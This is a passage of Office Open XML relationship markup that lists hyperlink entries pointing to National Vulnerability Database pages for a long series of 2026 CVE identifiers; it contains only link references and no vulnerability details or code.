Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76957" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80112" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83959" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" 